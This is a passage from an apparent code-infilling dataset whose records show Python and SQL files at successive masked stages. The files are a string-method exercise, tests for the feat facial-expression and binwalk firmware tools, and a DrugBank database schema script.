"step-4": "\"\"\"You are given a string .\r\nYour task is to find out if the string contains:\r\nalphanumeric characters, alphabetical characters, digits,\r\nlowercase and uppercase characters.\"\"\"\r\n\r\ns = raw_input()\r\nprint(any(i.isalnum()for i in s))\r\nprint(any(i.isalpha()for i in s))\r\nprint(any(i.isdigit()for i in s))\r\nprint(any(i.islower()for i in s))\r\nprint(any(i.isupper()for i in s))\r\n\r\n\r\n\"\"\" any() in python returns\r\nTrue is any of element of the iterable(list,tuple,dict,set etc) are true\r\nto the condition else returns False.\"\"\"\r\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_detector():
detector = Detector(n_jobs=1)
assert detector['n_jobs'] == 1
assert type(detector) == Detector
inputFname = os.path.join(get_test_data_path(), 'input.jpg')
out = detector.detect_image(inputFname=inputFname)
assert type(out) == Fex
assert len(out) == 1
assert out.happiness.values[0] > 0
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values[0] > 0
inputFname = os.path.join(get_test_data_path(), 'input.mp4')
out = detector.detect_video(inputFname=inputFname)
assert len(out) == 72
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values.max() > 0
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from feat.detector import Detector
from feat.data import Fex
from feat.utils import get_resource_path
from .utils import get_test_data_path
import pandas as pd
import feat
import os
import wget
def test_detector():
detector = Detector(n_jobs=1)
assert detector['n_jobs'] == 1
assert type(detector) == Detector
inputFname = os.path.join(get_test_data_path(), 'input.jpg')
out = detector.detect_image(inputFname=inputFname)
assert type(out) == Fex
assert len(out) == 1
assert out.happiness.values[0] > 0
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values[0] > 0
inputFname = os.path.join(get_test_data_path(), 'input.mp4')
out = detector.detect_video(inputFname=inputFname)
assert len(out) == 72
outputFname = os.path.join(get_test_data_path(), 'output.csv')
out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values.max() > 0
<|reserved_special_token_1|>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `feat` package."""
from feat.detector import Detector
from feat.data import Fex
from feat.utils import get_resource_path
from .utils import get_test_data_path
import pandas as pd
import feat
import os
import wget
# def test_models():
# print("Downloading FEX emotion model.")
# fex_emotion_model = "https://github.com/cosanlab/feat/releases/download/v0.1/fer_aug_model.h5"
# wget.download(fex_emotion_model, get_resource_path())
# if os.path.exists(os.path.join(get_resource_path(), "fer_aug_model.h5")):
# print("\nFEX emotion model downloaded successfully.\n")
# else:
# print("Something went wrong. Model not found in directory.")
# print("Downloading landmark detection model.")
# lbfmodel = "https://github.com/cosanlab/feat/releases/download/v0.1/lbfmodel.yaml"
# wget.download(lbfmodel, get_resource_path())
# if os.path.exists(os.path.join(get_resource_path(), "lbfmodel.yaml")):
# print("\nLandmark detection model downloaded successfully.\n")
# else:
# print("Something went wrong. Model not found in directory.")
# emotion_model = "fer_aug_model.h5"
# emotion_model_path = os.path.join(get_resource_path(), emotion_model)
# print("PATH TO EMOTION MODEL",emotion_model_path)
# assert os.path.exists(emotion_model_path)==True
# landmark_model = "lbfmodel.yaml"
# landmark_model_path = os.path.join(get_resource_path(), landmark_model)
# assert os.path.exists(landmark_model_path)==True
def test_detector():
detector = Detector(n_jobs=1)
assert detector['n_jobs']==1
assert type(detector)==Detector
# Test detect image
inputFname = os.path.join(get_test_data_path(), "input.jpg")
out = detector.detect_image(inputFname = inputFname)
assert type(out) == Fex
assert len(out) == 1
assert out.happiness.values[0] > 0
outputFname = os.path.join(get_test_data_path(), "output.csv")
out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values[0] > 0
# Test detect video
inputFname = os.path.join(get_test_data_path(), "input.mp4")
out = detector.detect_video(inputFname=inputFname)
assert len(out)==72
outputFname = os.path.join(get_test_data_path(), "output.csv")
out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)
assert out
assert os.path.exists(outputFname)
out = pd.read_csv(outputFname)
assert out.happiness.values.max() > 0
|
flexible
|
{
"blob_id": "753bdbf080e7a8652c39e40beeae51f74382d606",
"index": 1300,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs'] == 1\n assert type(detector) == Detector\n inputFname = os.path.join(get_test_data_path(), 'input.jpg')\n out = detector.detect_image(inputFname=inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0\n inputFname = os.path.join(get_test_data_path(), 'input.mp4')\n out = detector.detect_video(inputFname=inputFname)\n assert len(out) == 72\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0\n",
"step-3": "<mask token>\nfrom feat.detector import Detector\nfrom feat.data import Fex\nfrom feat.utils import get_resource_path\nfrom .utils import get_test_data_path\nimport pandas as pd\nimport feat\nimport os\nimport wget\n\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs'] == 1\n assert type(detector) == Detector\n inputFname = os.path.join(get_test_data_path(), 'input.jpg')\n out = detector.detect_image(inputFname=inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0\n inputFname = os.path.join(get_test_data_path(), 'input.mp4')\n out = detector.detect_video(inputFname=inputFname)\n assert len(out) == 72\n outputFname = os.path.join(get_test_data_path(), 'output.csv')\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0\n",
"step-4": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"Tests for `feat` package.\"\"\"\n\nfrom feat.detector import Detector\nfrom feat.data import Fex\nfrom feat.utils import get_resource_path\nfrom .utils import get_test_data_path\nimport pandas as pd\nimport feat\nimport os\nimport wget\n\n# def test_models():\n# print(\"Downloading FEX emotion model.\")\n# fex_emotion_model = \"https://github.com/cosanlab/feat/releases/download/v0.1/fer_aug_model.h5\"\n# wget.download(fex_emotion_model, get_resource_path())\n\n# if os.path.exists(os.path.join(get_resource_path(), \"fer_aug_model.h5\")):\n# print(\"\\nFEX emotion model downloaded successfully.\\n\")\n# else:\n# print(\"Something went wrong. Model not found in directory.\")\n\n# print(\"Downloading landmark detection model.\")\n# lbfmodel = \"https://github.com/cosanlab/feat/releases/download/v0.1/lbfmodel.yaml\"\n# wget.download(lbfmodel, get_resource_path())\n\n# if os.path.exists(os.path.join(get_resource_path(), \"lbfmodel.yaml\")):\n# print(\"\\nLandmark detection model downloaded successfully.\\n\")\n# else:\n# print(\"Something went wrong. Model not found in directory.\")\n\n# emotion_model = \"fer_aug_model.h5\"\n# emotion_model_path = os.path.join(get_resource_path(), emotion_model)\n# print(\"PATH TO EMOTION MODEL\",emotion_model_path)\n# assert os.path.exists(emotion_model_path)==True\n\n# landmark_model = \"lbfmodel.yaml\"\n# landmark_model_path = os.path.join(get_resource_path(), landmark_model)\n# assert os.path.exists(landmark_model_path)==True\n\ndef test_detector():\n detector = Detector(n_jobs=1)\n assert detector['n_jobs']==1\n assert type(detector)==Detector\n\n # Test detect image\n inputFname = os.path.join(get_test_data_path(), \"input.jpg\")\n out = detector.detect_image(inputFname = inputFname)\n assert type(out) == Fex\n assert len(out) == 1\n assert out.happiness.values[0] > 0 \n\n outputFname = os.path.join(get_test_data_path(), \"output.csv\")\n out = detector.detect_image(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values[0] > 0 \n\n # Test detect video\n inputFname = os.path.join(get_test_data_path(), \"input.mp4\")\n out = detector.detect_video(inputFname=inputFname)\n assert len(out)==72\n\n outputFname = os.path.join(get_test_data_path(), \"output.csv\")\n out = detector.detect_video(inputFname=inputFname, outputFname=outputFname)\n assert out\n assert os.path.exists(outputFname)\n out = pd.read_csv(outputFname)\n assert out.happiness.values.max() > 0",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def test_firmware_squashfs():
"""
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
"""
expected_results = [[0,
'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'], [
112,
'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'
], [1179760,
'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'
], [1179792,
'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'
]]
scan_result = binwalk.scan(dirname(__file__) +
'/input-vectors/firmware.squashfs', signature=True, quiet=True,
extract=True)
eq_(len(scan_result), 1)
eq_(len(scan_result[0].results), len(expected_results))
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
<|reserved_special_token_1|>
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
"""
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
"""
expected_results = [[0,
'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'], [
112,
'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'
], [1179760,
'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'
], [1179792,
'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'
]]
scan_result = binwalk.scan(dirname(__file__) +
'/input-vectors/firmware.squashfs', signature=True, quiet=True,
extract=True)
eq_(len(scan_result), 1)
eq_(len(scan_result[0].results), len(expected_results))
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
<|reserved_special_token_1|>
from os.path import dirname
import binwalk
from nose.tools import eq_, ok_
def test_firmware_squashfs():
'''
Test: Open hello-world.srec, scan for signatures
verify that only one signature is returned
verify that the only signature returned is Motorola S-rec data-signature
'''
expected_results = [
[0, 'DLOB firmware header, boot partition: "dev=/dev/mtdblock/2"'],
[112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],
[1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],
[1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],
]
scan_result = binwalk.scan(
dirname(__file__) + '/input-vectors/firmware.squashfs',
signature=True,
quiet=True,
extract=True) # Throws a warning for missing external extractor
# Test number of modules used
eq_(len(scan_result), 1)
# Test number of results for that module
eq_(len(scan_result[0].results), len(expected_results))
# Test result-description
for i in range(0, len(scan_result[0].results)):
eq_(scan_result[0].results[i].offset, expected_results[i][0])
eq_(scan_result[0].results[i].description, expected_results[i][1])
|
flexible
|
{
"blob_id": "d55043c2a18b935478d9be442aaf7305231edc7d",
"index": 5828,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-3": "from os.path import dirname\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n \"\"\"\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n \"\"\"\n expected_results = [[0,\n 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'], [\n 112,\n 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'\n ], [1179760,\n 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'\n ], [1179792,\n 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'\n ]]\n scan_result = binwalk.scan(dirname(__file__) +\n '/input-vectors/firmware.squashfs', signature=True, quiet=True,\n extract=True)\n eq_(len(scan_result), 1)\n eq_(len(scan_result[0].results), len(expected_results))\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-4": "from os.path import dirname\n\nimport binwalk\nfrom nose.tools import eq_, ok_\n\n\ndef test_firmware_squashfs():\n '''\n Test: Open hello-world.srec, scan for signatures\n verify that only one signature is returned\n verify that the only signature returned is Motorola S-rec data-signature\n '''\n expected_results = [\n [0, 'DLOB firmware header, boot partition: \"dev=/dev/mtdblock/2\"'],\n [112, 'LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 3466208 bytes'],\n [1179760, 'PackImg section delimiter tag, little endian size: 11548416 bytes; big endian size: 3649536 bytes'],\n [1179792, 'Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 3647665 bytes, 1811 inodes, blocksize: 524288 bytes, created: 2013-09-17 06:43:22'],\n ]\n\n scan_result = binwalk.scan(\n dirname(__file__) + '/input-vectors/firmware.squashfs',\n signature=True,\n quiet=True,\n extract=True) # Throws a warning for missing external extractor\n # Test number of modules used\n eq_(len(scan_result), 1)\n # Test number of results for that module\n eq_(len(scan_result[0].results), len(expected_results))\n # Test result-description\n for i in range(0, len(scan_result[0].results)):\n eq_(scan_result[0].results[i].offset, expected_results[i][0])\n eq_(scan_result[0].results[i].description, expected_results[i][1])\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
import logging
from tqdm import tqdm
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info('Creating %d tables', len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
<|reserved_special_token_1|>
import logging
from tqdm import tqdm
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
def create_tables(db_engine):
"""RUN SQL STATEMENTS TO CREATE TABLES"""
with db_engine.connect() as conn:
create_table_stmts = []
create_drugs_table = """
DROP TABLE IF EXISTS drugs CASCADE;
CREATE TABLE drugs (
drugbank_id char(7) PRIMARY KEY,
name varchar NOT NULL, -- Something “Human Readable”,
smiles varchar
);
"""
create_table_stmts.append(create_drugs_table)
create_drug_id_types_table = """
DROP TABLE IF EXISTS drug_identifier_types CASCADE;
CREATE TABLE drug_identifier_types (
identifier_type_id SERIAL UNIQUE,
identifier_type_name varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_id_types_table)
create_drug_identifiers_table = """
DROP TABLE IF EXISTS drug_identifiers CASCADE;
CREATE TABLE drug_identifiers (
drugbank_id char(7) references drugs(drugbank_id),
alt_identifier_value varchar NOT NULL,
alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,
alt_identifier_url varchar
);
"""
create_table_stmts.append(create_drug_identifiers_table)
create_drug_action_types = """
DROP TABLE IF EXISTS drug_action_types CASCADE;
CREATE TABLE drug_action_types (
action_type_id SERIAL UNIQUE,
action_type varchar UNIQUE
);
"""
create_table_stmts.append(create_drug_action_types)
create_drug_targets_table = """
DROP TABLE IF EXISTS drug_targets CASCADE;
CREATE TABLE drug_targets (
drugbank_id char(7) references drugs(drugbank_id),
gene_name varchar NOT NULL,
action_type_id int references drug_action_types(action_type_id),
UNIQUE(drugbank_id, gene_name, action_type_id)
);
"""
create_table_stmts.append(create_drug_targets_table)
logger.info("Creating %d tables", len(create_table_stmts))
for stmt in tqdm(create_table_stmts):
conn.execute(stmt)
|
flexible
|
{
"blob_id": "f4c3b6ee6389b31c6a280bf7cfe920a2791c1299",
"index": 4125,
"step-1": "<mask token>\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-2": "<mask token>\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url varchar\n );\n \"\"\"\n create_table_stmts.append(create_drug_identifiers_table)\n create_drug_action_types = \"\"\"\n DROP TABLE IF EXISTS drug_action_types CASCADE;\n CREATE TABLE drug_action_types (\n action_type_id SERIAL UNIQUE, \n action_type varchar UNIQUE\n );\n \"\"\"\n create_table_stmts.append(create_drug_action_types)\n create_drug_targets_table = \"\"\"\n DROP TABLE IF EXISTS drug_targets CASCADE;\n CREATE TABLE drug_targets (\n drugbank_id char(7) references drugs(drugbank_id),\n gene_name varchar NOT NULL, \n action_type_id int references drug_action_types(action_type_id),\n UNIQUE(drugbank_id, gene_name, action_type_id)\n );\n \"\"\"\n create_table_stmts.append(create_drug_targets_table)\n logger.info('Creating %d tables', len(create_table_stmts))\n for stmt in tqdm(create_table_stmts):\n conn.execute(stmt)\n",
"step-3": "<mask token>\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef create_tables(db_engine):\n \"\"\"RUN SQL STATEMENTS TO CREATE TABLES\"\"\"\n with db_engine.connect() as conn:\n create_table_stmts = []\n create_drugs_table = \"\"\"\n DROP TABLE IF EXISTS drugs CASCADE; \n CREATE TABLE drugs (\n drugbank_id char(7) PRIMARY KEY,\n name varchar NOT NULL, -- Something “Human Readable”,\n smiles varchar\n );\n \"\"\"\n create_table_stmts.append(create_drugs_table)\n create_drug_id_types_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifier_types CASCADE; \n CREATE TABLE drug_identifier_types (\n identifier_type_id SERIAL UNIQUE, \n identifier_type_name varchar UNIQUE\n ); \n \"\"\"\n create_table_stmts.append(create_drug_id_types_table)\n create_drug_identifiers_table = \"\"\"\n DROP TABLE IF EXISTS drug_identifiers CASCADE;\n CREATE TABLE drug_identifiers (\n drugbank_id char(7) references drugs(drugbank_id),\n alt_identifier_value varchar NOT NULL,\n alt_identifier_type_id int references drug_identifier_types(identifier_type_id) NOT NULL,\n alt_identifier_url 